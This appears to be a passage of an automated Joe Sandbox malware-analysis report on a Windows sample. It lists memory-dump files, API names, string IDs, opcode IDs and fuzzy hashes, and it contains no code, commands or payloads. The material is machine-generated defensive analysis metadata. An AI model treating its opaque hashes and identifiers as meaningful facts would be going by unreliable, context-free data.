                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                                                                                                                                          • Instruction ID: b651c04e4c89275fb5a26b9828b87a1305cf92e52f482f8754287c1f8d70d817
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                                                                                                                                          • Instruction Fuzzy Hash: EFF08122A0C642A5EB289F28E84137AA660EF04B7AF884334D73C012D4DF3AD9958320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                                                                                                          • String ID: %ls$%s: %s
                                                                                                                                                                          • API String ID: 2539828978-2259941744
                                                                                                                                                                          • Opcode ID: 87ea6f5bcc4e1b3ad6ac3b10cad88529b6f4803ac2bf8d6679d8dd7104d9238e
                                                                                                                                                                          • Instruction ID: be81187ad9b85b916ee8a83a036f075dd2a35b11ad96127b6f4f19023efd856a
                                                                                                                                                                          • Opcode Fuzzy Hash: 87ea6f5bcc4e1b3ad6ac3b10cad88529b6f4803ac2bf8d6679d8dd7104d9238e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0EB2B662A1D68261EA10BB25E8542BBE351FFC9790F90433AE69D47BD6DF2FE540C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                          • API String ID: 1759834784-2761157908
                                                                                                                                                                          • Opcode ID: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                                                                                                                                                          • Instruction ID: 7de16e7afc42195ffb586bbc650a0504fdf31f8bbf3e7f7b55a79a74f3e55b44
                                                                                                                                                                          • Opcode Fuzzy Hash: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                                                                                                                                                          • Instruction Fuzzy Hash: C8B2F672A082828BE775AE25DC407FDB7A1FF84388F985135DA1A97F84DF39E5148B10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1693479884-0
                                                                                                                                                                          • Opcode ID: a763a03e94ac9eb552bec9fcc4b44f4ad800b0a698e118a479ea2ebfada1421e
                                                                                                                                                                          • Instruction ID: 0980293dc8dd20d62a0a2fd97388b67803994e2285e5dffc2239393fb058ea04
                                                                                                                                                                          • Opcode Fuzzy Hash: a763a03e94ac9eb552bec9fcc4b44f4ad800b0a698e118a479ea2ebfada1421e
                                                                                                                                                                          • Instruction Fuzzy Hash: 58A1E262F18B5295FF00AB798C541BEA361AF44BE4B944236DE2D17BC8EF3EE441C210
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                          • Opcode ID: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                          • Instruction ID: e576ca3d9aa75ce997e17549934f4332a650dfbd6ac9e6eec192770e02ca92a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                          • Instruction Fuzzy Hash: 51313072609B8199EB609F61E8503EEB364FF44748F84443ADA4D47B95DF39D648C720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                          • Opcode ID: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                          • Instruction ID: 29c3942f28606303345fd3db3b976afe41d67084561841d6d1301b6ce16ab9c4
                                                                                                                                                                          • Opcode Fuzzy Hash: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                          • Instruction Fuzzy Hash: A4318232618B8196DB20DF25EC503AEB7A4FF88754F940136EA9D43B55DF3DC5458B10
                                                                                                                                                                          APIs
                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF70ED02F54
                                                                                                                                                                            • Part of subcall function 00007FF70ECFAEC4: GetCurrentProcess.KERNEL32(00007FF70ED0415D), ref: 00007FF70ECFAEF1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: CurrentProcess_invalid_parameter_noinfo
• String ID: *?$.
• API String ID: 2518042432-3972193922
• Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
• Instruction ID: 348d7f10c9c2bee9766f04da593ce7f5cd8b2ef9ce79bc2c197334548ff3546b
• Opcode Fuzzy Hash: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
• Instruction Fuzzy Hash: AD51F362B15B9585EB10EFA29C006FDA7A4FF48BD8B984536DE1D97B85DF3CD0428320
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
• Instruction ID: 904223523dc95e1981066ae9fee1f871a1a34a0d00370d2ab53b0d4c1e4d795a
• Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
• Instruction Fuzzy Hash: 9ED19232B1928687DB34DF15F5847AAB7A1FB88784F988134DF4A97B44DB3DE8418B10
APIs
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF70ECDFD53), ref: 00007FF70ECD3C05
• FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF70ECDFD53), ref: 00007FF70ECD3C39
• LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF70ECDFD53), ref: 00007FF70ECD3C63
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: ErrorFormatFreeLastLocalMessage
• String ID:
• API String ID: 1365068426-0
• Opcode ID: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
• Instruction ID: 12f31fde12f6e07135a0633e27057f0e29922b5d820ca7d071be1274deff4fcf
• Opcode Fuzzy Hash: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
• Instruction Fuzzy Hash: 08012C7170C78692E710AB26B88027BE391FF89BC0F884135EA8D87B59DF3DD5058710
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
• Instruction ID: 4e5361191a1981d5d6a566072d457051bc447fd58a9e1e6ced12fd61309db79e
• Opcode Fuzzy Hash: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
• Instruction Fuzzy Hash: C631EA22B1869155E720AB36DC057AAAB91EF44BE4F488635EE6C47BC5CF3CD5118300
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
• Instruction ID: 09c1f90e98f62ad245c4159527e9750a4c0a2d5183a10c3895a5b14178c38f57
• Opcode Fuzzy Hash: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
• Instruction Fuzzy Hash: 85B18B73604B888BEB15CF29C89536CBBA0FBC4B48F588831DA5D837A5CB39D451C710
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID:
• API String ID: 1061551593-0
• Opcode ID: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
• Instruction ID: 4d1bc43e256d5ef45fafa4f8cd2207401fa22607af83722285fb62f17ccb3128
• Opcode Fuzzy Hash: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
• Instruction Fuzzy Hash: B7813A36B18A458AEB10DB6AD840AAEB771FF88B88B544132DE0D57764DF3DD105C750
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
• Opcode ID: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
• Instruction ID: 9b873fe0773757e6305041d21420e430c23e3319d953b4a3e7db23bdc194d3b7
• Opcode Fuzzy Hash: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
• Instruction Fuzzy Hash: 9C114F72A18B85A5E721AF21E8503EAB361FF88B44FC44135DA8D43B64DF3CE646C754
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
• Instruction ID: 7437293c11f6e26d2c2a0eca2df9345381e71f6b40c1cc32fbd897e0dda1fb52
• Opcode Fuzzy Hash: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
• Instruction Fuzzy Hash: 50014475A0C5469BE628EB10EC5037AB3A1FF98364F910239E68E477A4DF3DE5018E20
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: 0
                                                                                                                                                                          • API String ID: 3215553584-4108050209
                                                                                                                                                                          • Opcode ID: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                                                                                                                                                          • Instruction ID: 0ddb2a2c4c0aa71dee5a9ad05d8ba569ffb91dc500ec7795237044a432e2a3c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B812822B1C10A66EBB8AA158860EBFE390EF41744FD45531ED0987695CF3FE856C268
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3215553584-4108050209
                                                                                                                                                                          • Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                                                                                          • Instruction ID: 166570f52916a37d722c6cf3efb1483ca396a5dea5cdad0c9d71bb20c76809a6
                                                                                                                                                                          • Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                                                                                          • Instruction Fuzzy Hash: A7711525B0C24666FB68AA29C8706BFE3909F41744F940531DE0D87AD6CF3FEC468B61
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                          • Opcode ID: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                                                                                                                                                          • Instruction ID: c362ad4c0589df3349e338e3c13a6d6f039b813114788dd8cc8c8bbfbf862bd0
                                                                                                                                                                          • Opcode Fuzzy Hash: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                                                                                                                                                          • Instruction Fuzzy Hash: F441C232714A4486EE44EF2AD8642ADB3A1EB58FD0B8D9036EE4D87754EF3DD042C300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                          • Opcode ID: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                                                                                                                                                          • Instruction ID: 7cbe41082b2786658aace3d665031738d20c64dcacd8eeab6182a97836fded6e
                                                                                                                                                                          • Opcode Fuzzy Hash: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EB09224E0BA06C6EA083B216C8221862A8BF48700FD8803AC04C82320DF2C24A58B20
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
